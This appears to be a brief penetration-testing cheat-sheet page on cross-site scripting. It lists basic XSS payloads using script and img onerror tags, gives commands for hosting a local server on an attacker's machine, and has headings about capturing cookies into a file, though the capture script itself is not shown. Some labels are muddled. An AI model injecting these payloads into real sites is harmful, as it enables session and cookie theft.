XSS Attacks
XSS Attacks
Only Works when website is not HTTPOnly
XSS Scripts
Basic XSS Payloads
</b><img src=x onerror=alert(document.domain)></img><b> </b><script>alert(document.domain)</script><b>
Open local File Server
Open local File server Using PHP
php -S 0.0.0.0:80
Open local File server Using PHP
python3 -m http.server 80
Get Cookies As Request
Script Used in Attacker System for hosting
Strings(Cookie requests) Stored in gathered_info.txt
File
Other Resources
Last updated
Was this helpful?